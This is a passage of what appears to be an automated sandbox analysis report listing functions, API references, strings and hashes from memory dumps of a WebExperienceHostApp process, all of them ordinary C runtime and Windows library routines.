Msg:[%ws] , xrefs: 00007FF619493CF1
, xrefs: 00007FF619493CD6
[%hs], xrefs: 00007FF619493D4C
LogNt, xrefs: 00007FF619493B85
[%hs(%hs)], xrefs: 00007FF619493D33
CallContext:[%hs] , xrefs: 00007FF619493D0C
(caller: %p) , xrefs: 00007FF619493C77
%hs!%p: , xrefs: 00007FF619493C59
LogHr, xrefs: 00007FF619493B7E
FailFast, xrefs: 00007FF619493B71
%hs(%d) tid(%x) %08X %ws, xrefs: 00007FF619493CAE
Exception, xrefs: 00007FF619493BAA

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$LogNt$Msg:[%ws] $ReturnHr$ReturnNt$[%hs(%hs)]$[%hs]
API String ID: 2411632146-1363043106
Opcode ID: 5c63f51611423cf63e7b47493f3111f8813da6670d8a67703035579ad02dc22e
Instruction ID: 3e680306b309676ddaca49de2b3c8d21eb9113e97c516c33ad40677e41f98513
Opcode Fuzzy Hash: 5c63f51611423cf63e7b47493f3111f8813da6670d8a67703035579ad02dc22e
Instruction Fuzzy Hash: 8471AA21A09E4295EA64DF65A6106B963A0FF4DFACF405136EE4E83799DF3CE564C300

Function 00007FFE1A45C0EC Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 289COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C17D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C1B6
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C28A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C29B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C303
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C313
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C35F
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C371
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C4E3

Part of subcall function 00007FFE1A45E098: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A45E0F2

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C565
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C574

Strings

`anonymous namespace', xrefs: 00007FFE1A45C443

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID: `anonymous namespace'
API String ID: 3863519203-3062148218
Opcode ID: 180c6269b417ee698a575686cc6b4d1958a01edd13727ba1ef1c9a4d3a0f115e
Instruction ID: b4834338a58c9a02d6de5d8127d63e8560c93f4f1c1ca972f2cdc119c84f926a
Opcode Fuzzy Hash: 180c6269b417ee698a575686cc6b4d1958a01edd13727ba1ef1c9a4d3a0f115e
Instruction Fuzzy Hash: CDE18CB2A08F8295EB10EF66E4801BD77B0FB45B94F9442B2EA4D17B65DF38E564C700

Function 00007FFE1A45CF40 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D2F6
atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFE1A458568), ref: 00007FFE1A45D3A7
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45D3E6
swprintf_s.PGOCR ref: 00007FFE1A45D406
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45D416
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D466

Strings

nullptr, xrefs: 00007FFE1A45D12D
lambda, xrefs: 00007FFE1A45D308
`generic-class-parameter-, xrefs: 00007FFE1A45D477
`generic-method-parameter-, xrefs: 00007FFE1A45D433
`template-type-parameter-, xrefs: 00007FFE1A45D487
NULL, xrefs: 00007FFE1A45D00A

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: NameName::Name::operator+$atolswprintf_s
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
API String ID: 1620834350-2441609178
Opcode ID: a29e71e536bdf6e447e3ff857d12b2a59669ef8e6c250949fd0826cea6345cbe
Instruction ID: d44273c409dca23b6afe7104a42ca608d68b290900bf3930b3c179d6c46bc475
Opcode Fuzzy Hash: a29e71e536bdf6e447e3ff857d12b2a59669ef8e6c250949fd0826cea6345cbe
Instruction Fuzzy Hash: 21F16CA2F08E4294FB14FBA6C5541BC27A0AF45F64F4401F7DA8E16AB5DF3CA56AC340

Function 00007FFE1A45A558 Relevance: 22.9, APIs: 15, Instructions: 355COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A5A9
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A672
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A6BB
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A6CC

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 79b7bf95ee04f70869f45912711fcc0273f108ef1dfd3bc8f68c2be49afff2d4
Instruction ID: 93107e03eb6ca42b97677544666e4ce944b6a501f336688e515de96165a7cc6d
Opcode Fuzzy Hash: 79b7bf95ee04f70869f45912711fcc0273f108ef1dfd3bc8f68c2be49afff2d4
Instruction Fuzzy Hash: F9F17CB6B08B8299EB00EF66D4501FC37B0EB04B5CF4444B6EA4D57AA9DF38D569C340

Function 00007FFE007A2740 Relevance: 18.2, APIs: 12, Instructions: 240COMMON

Download Yara Rule

APIs

__strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007A2786
__strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007A27AB
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE007A27EB
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFE007A288E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A28F5
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFE007A2930
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A2952
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFE007A297B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A29DB
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFE007A2A13
CompareStringEx.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFE007A2A46
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A2A73

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ByteCharMultiWide$__strncntfreemalloc$CompareInfoString
String ID:
API String ID: 3420081407-0
Opcode ID: 8b6a2b54a2774314e61cfe64b8eab3a827394a4d764bd27520b14f448ccade5b
Instruction ID: 80209c4827cee29c5012277e6f593d3b5b3b0d85c0bf003cd729f6c5774a314c
Opcode Fuzzy Hash: 8b6a2b54a2774314e61cfe64b8eab3a827394a4d764bd27520b14f448ccade5b
Instruction Fuzzy Hash: 3DA1C822B0A78245FB30AB29D45037A6691AF86BA4F5C4231FF5D167EEDF7CE4468300

Function 00007FFE1A452CF4 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE1A452D51

Part of subcall function 00007FFE1A455050: __GetUnwindTryBlock.LIBCMT ref: 00007FFE1A455093
Part of subcall function 00007FFE1A455050: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE1A4550B8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A452E29
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452E36
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE1A453080
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4530AE

Part of subcall function 00007FFE1A456770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4523AE), ref: 00007FFE1A45677E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453174
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A4531A9

Strings

csm, xrefs: 00007FFE1A452DD2
csm, xrefs: 00007FFE1A452D6B
csm, xrefs: 00007FFE1A452E4E

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 4223619315-393685449
Opcode ID: edc5f55d8364ed346ae9e81db86cccb1f66bda3bd14ed8078bac2ea6355eac48
Instruction ID: dfb11700877184f2d41b0969f5050511cbfc54ebc94f463632369935a5a8a997
Opcode Fuzzy Hash: edc5f55d8364ed346ae9e81db86cccb1f66bda3bd14ed8078bac2ea6355eac48
Instruction Fuzzy Hash: 30E162B2B08B4186EB10EB66D4502BD77A4FB45FA8F1401B6EE4D57B69CF38E4A1C701

Function 00007FFE1A45E098 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A45E0F2

Strings

template-parameter-, xrefs: 00007FFE1A45E15F
generic-type-, xrefs: 00007FFE1A45E1A6
`generic-type-, xrefs: 00007FFE1A45E1D9
`template-parameter-, xrefs: 00007FFE1A45E192

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Replicator::operator[]
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 3676697650-3207858774
Opcode ID: 068e360b79be31260e9f0f338d3f50443f14e550a52f9abb55243442d8c120c9
Instruction ID: aea787724c6f74874a4f6d6c5016b05e29da353049ab9c80d24370c4f30c2862
Opcode Fuzzy Hash: 068e360b79be31260e9f0f338d3f50443f14e550a52f9abb55243442d8c120c9
Instruction Fuzzy Hash: A7918FB2B08E8695FB20AB26D4512B877B0AB48F64F8881F3DA5D037A5DF3CD565C740

Function 00007FFE007B7038 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
Part of subcall function 00007FFE007DBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
Part of subcall function 00007FFE007DBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
Part of subcall function 00007FFE007DBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

_Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE007BB06E), ref: 00007FFE007B7083
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE007BB06E), ref: 00007FFE007B70A3
_Maklocstr.LIBCPMT ref: 00007FFE007B70BD
_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE007BB06E), ref: 00007FFE007B70C6
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE007BB06E), ref: 00007FFE007B70E6
_Maklocstr.LIBCPMT ref: 00007FFE007B7100
_Maklocstr.LIBCPMT ref: 00007FFE007B7115

Part of subcall function 00007FFE007A4D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D32
Part of subcall function 00007FFE007A4D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D58
Part of subcall function 00007FFE007A4D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D70

Strings

:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE007B70AD
:AM:am:PM:pm, xrefs: 00007FFE007B710E
:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFE007B70F0

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Maklocstrfree$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 2460671452-35662545
Opcode ID: 68a3b1b276eb7da605c86357e63600b8dc1e5b54f3908e2d283bd71975fe3a53
Instruction ID: b9e6b453451f8af2d3ab81d942afc6e64a0b7dafa873ba39aa8e1268077793cd
Opcode Fuzzy Hash: 68a3b1b276eb7da605c86357e63600b8dc1e5b54f3908e2d283bd71975fe3a53
Instruction Fuzzy Hash: 7C313822A0AB4686EB14EF21E8402B977A5FB99F84F498135DB4D5376ADF3CE185C340

Function 00007FFE007A2B70 Relevance: 16.7, APIs: 11, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007A2BB7
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFE007A2BE3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A2C53
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFE007A2C8C
LCMapStringEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE007A2CC3
LCMapStringEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE007A2D1C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A2D82
LCMapStringEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE007A2DCA
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFE007A2E0C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A2E20
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A2E3D

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ByteCharMultiStringWide$freemalloc$__strncnt
String ID:
API String ID: 1733283546-0
Opcode ID: 7481873b54e877f7fc9af2c00e2f3984987d914e500c084b73b5f1e45f384833
Instruction ID: 4bff10f4b5b9311479de64cb9c8113ad1332261b320173f694ec9ad9e80f0db9
Opcode Fuzzy Hash: 7481873b54e877f7fc9af2c00e2f3984987d914e500c084b73b5f1e45f384833
Instruction Fuzzy Hash: 6F81C23260AB4186EB249F25E44437963A1FF85BA8F180235EB5E17BEDDF3CE4468300

Function 00007FFE007D9DE0 Relevance: 16.7, APIs: 11, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DA764: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA78A
Part of subcall function 00007FFE007DA764: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA7F4

_Stoflt.LIBCPMT ref: 00007FFE007D9E64
_FXp_setw.LIBCPMT ref: 00007FFE007D9E7E
_FXp_setw.LIBCPMT ref: 00007FFE007D9E91
_FXp_setn.LIBCPMT ref: 00007FFE007D9ED5
_FXp_addx.LIBCPMT ref: 00007FFE007D9EE7
_FXp_setw.LIBCPMT ref: 00007FFE007D9F3E
_FXp_setw.LIBCPMT ref: 00007FFE007D9F51
_FXp_setn.LIBCPMT ref: 00007FFE007D9E9C

Part of subcall function 00007FFE007D1384: _FXp_setw.LIBCPMT ref: 00007FFE007D13BD

_FXp_setn.LIBCPMT ref: 00007FFE007D9F5C
_FXp_setn.LIBCPMT ref: 00007FFE007D9F95
_FXp_addx.LIBCPMT ref: 00007FFE007D9FA7

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setw$Xp_setn$Xp_addx$Stofltisspaceisxdigit
String ID:
API String ID: 3166507417-0
Opcode ID: a2a4b0507d6de304d91fa30e7ec2a10c1d98e7d84d314cc1b7b0df0453b4069f
Instruction ID: 3c7dfc116367b8854bcf3a729be6c62e949279d69f9829091a3197e6ec07ff49
Opcode Fuzzy Hash: a2a4b0507d6de304d91fa30e7ec2a10c1d98e7d84d314cc1b7b0df0453b4069f
Instruction Fuzzy Hash: 80617122F0A5429AEB10EFA2D4806FD2731AB54748F584137DF4D67BADDE3CE54A8340

Function 00007FFE007EA100 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007EA30E
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007EA31F
std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007EA362
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007EA373
std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007EA3ED
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007EA3FE

Strings

ios_base::failbit set, xrefs: 00007FFE007EA2E2, 00007FFE007EA336, 00007FFE007EA3C1
ios_base::eofbit set, xrefs: 00007FFE007EA2E9, 00007FFE007EA33D, 00007FFE007EA3C8
ios_base::badbit set, xrefs: 00007FFE007EA2D6, 00007FFE007EA32A, 00007FFE007EA380, 00007FFE007EA3B4, 00007FFE007EA410

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: a6b4dea8a168317dac851dd429efa45bd2771e1e18792c249c39bd327d446b57
Instruction ID: 24f2ea0f4ee46339273acc8314f092b146ae93e31323759f97224ead83ec56a1
Opcode Fuzzy Hash: a6b4dea8a168317dac851dd429efa45bd2771e1e18792c249c39bd327d446b57
Instruction Fuzzy Hash: B891D122A0AA8691EF64AB19D4903B93760FB84F84F488036CB4D577BDDF3DE546C301

Function 00007FFE1A459E5C Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459EB8
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459FE6

Strings

struct , xrefs: 00007FFE1A45A00A
union , xrefs: 00007FFE1A45A013
class , xrefs: 00007FFE1A459FFB
`unknown ecsu', xrefs: 00007FFE1A459E84
cointerface , xrefs: 00007FFE1A459F8D
enum , xrefs: 00007FFE1A459FA8
coclass , xrefs: 00007FFE1A459F9F

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 2943138195-1464470183
Opcode ID: 2a39ff73fab8a5f8cf54c613ca86ba6d613e7bbbceaec38d40d1587625a9a752
Instruction ID: 010396b69e45f07d2163dc9627911a33671a037f2de45e4776ad98c5c0c1087b
Opcode Fuzzy Hash: 2a39ff73fab8a5f8cf54c613ca86ba6d613e7bbbceaec38d40d1587625a9a752
Instruction Fuzzy Hash: 43518DB2F18F5299FB14DB66E8445BC37B0BB04BA8F5001BADA0D53AA9DF38D564C300

Function 00007FFE007DBE90 Relevance: 15.2, APIs: 10, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DC618: iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007DBC62), ref: 00007FFE007DC63E
Part of subcall function 00007FFE007DC618: iswxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007DBC62), ref: 00007FFE007DC6B6

_FXp_setw.LIBCPMT ref: 00007FFE007DBF2E
_FXp_setw.LIBCPMT ref: 00007FFE007DBF41
_FXp_setn.LIBCPMT ref: 00007FFE007DBF85
_FXp_addx.LIBCPMT ref: 00007FFE007DBF97
_FXp_setw.LIBCPMT ref: 00007FFE007DBFEE
_FXp_setw.LIBCPMT ref: 00007FFE007DC001
_FXp_setn.LIBCPMT ref: 00007FFE007DBF4C

Part of subcall function 00007FFE007D1384: _FXp_setw.LIBCPMT ref: 00007FFE007D13BD

_FXp_setn.LIBCPMT ref: 00007FFE007DC00C
_FXp_setn.LIBCPMT ref: 00007FFE007DC045
_FXp_addx.LIBCPMT ref: 00007FFE007DC057

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

